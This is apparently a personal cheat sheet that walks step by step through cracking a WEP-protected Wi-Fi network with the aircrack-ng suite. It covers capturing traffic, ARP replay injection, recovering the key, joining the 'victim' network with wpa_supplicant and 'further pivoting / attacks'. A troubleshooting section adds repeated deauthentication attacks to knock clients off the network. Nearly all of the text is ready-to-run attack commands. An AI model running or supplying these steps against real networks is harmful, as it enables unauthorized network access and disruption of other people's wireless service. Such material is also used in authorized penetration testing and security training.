Step 1) Have a wireless card that you can set to monitor mode, then run the commands below:
sudo iw dev wlan0 interface add wlan0mon type monitorsudo ip link set wlan0mon up
Step 2) Then run airodump-ng to gather details about the WiFi network. Obtain the required details below.
sudo airodump-ng wlan0mon- BSSID –
- Channel –
- ESSID –
Step 3) Stop the process, then run airodump-ng again to gather specific information and Station information. See “Troubleshooting Steps” if no Stations appear.
sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID of SSID to attack> wlan0mon- Station –
Step 4) Stop the process, then run airodump-ng again to output the captured traffic to PCAP
sudo airodump-ng -c <channel> --bssid <BSSID of SSID to attack> -w out wlan0mon
Step 5) Launch another terminal then run the command below
sudo aireplay-ng -3 -b <BSSID of SSID to attack> -h <Station MAC address from Step 3> wlan0mon
Step 6) Wait for around 100,000 data packets in #Data, then stop the airodump-ng and aireplay-ng processes
Step 7) Crack WEP key using aircrack-ng
sudo aircrack-ng out-01.cap
Step 8) Create a wpa_supplicant config file to be used in step 9
nano wepconfig.confnetwork={
ssid=”CHANGE_THIS_TO_THE_VICTIM_ESSID_FROM_STEP_2″
key_mgmt=NONE
wep_key0=”CHANGE_THIS_TO_CRACKED_KEY_FROM_STEP_7″
wep_tx_keyidx=0
}
Step 9) Connect to the WEP network using wpa_supplicant
sudo wpa_supplicant -B -i wlan0 -c wepconfig.conf-B to put process in background
-i to specify physical interface
Step 10) Obtain IP address from the wireless router
dhclient -v wlan0-v for verbose
Step 11) Perform further pivoting / attacks, then disconnect from the network
sudo killall wpa_supplicant
Troubleshooting Steps
If no Stations are listed in Step 3, try spamming deauthentication attacks to force clients to reconnect back to the wireless network and appear in your airodump-ng listing
sudo aireplay-ng -0 5 -a <BSSID from Step 2> wlan0mon-0 5 to perform deauthentication attack five times
References
Ben's IR Notes 